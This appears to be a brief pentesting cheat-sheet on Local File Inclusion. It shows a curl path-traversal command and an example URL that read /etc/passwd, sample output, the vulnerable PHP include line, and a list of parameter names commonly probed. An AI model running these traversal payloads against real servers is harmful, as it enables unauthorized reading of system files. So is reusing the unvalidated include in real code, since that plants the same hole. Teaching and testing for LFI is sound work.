😎Local File Inclusion (LFI)
Reading etc/passwd with Curl using –path-as-is flag
curl --path-as-is https://example.com/data/../../../../../etc/passwd
----------------------------------------------------------------
How to Detect and Exploit Them?
When we test for Local File Inclusion or Remote File Inclusion vulnerabilities, we should be looking for scripts that take filenames as parameters, such as ‘file, URL, path, filename’, etc.
If we consider the following example:
http://vulnerable-website/file.php?file=index.phpSince we see the parameter ‘file’ that calls for another file on the server, we can try to read arbitrary files from the server. For the sake of the example, we’ll be calling: /etc/passwd file.
http://vulnerable-website/file.php?file=../../../../etc/passwdIf the application doesn’t filter the file being called, and if the vulnerability exists, then the /etc/passwd file content will return in the response.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
………..----------------------------------------------------------------
The reason for the lack of filtering for files being called is the lack of input validation in the file.php file content. The file parameter is being run based on the following PHP code which allows reading the content of arbitrary files in the server.
<?php include($_GET[‘file’].”.php”); ?>The most common parameters to be tested for LFI can be found below:
cat
dir
action
board
date
detail
file
download
path
folder
prefix
include
page
------------------------------------------------------------------inc
locate
show
doc
site
type
view
content
document
layout
mod
conf----------------------------------------------------------------
Last updated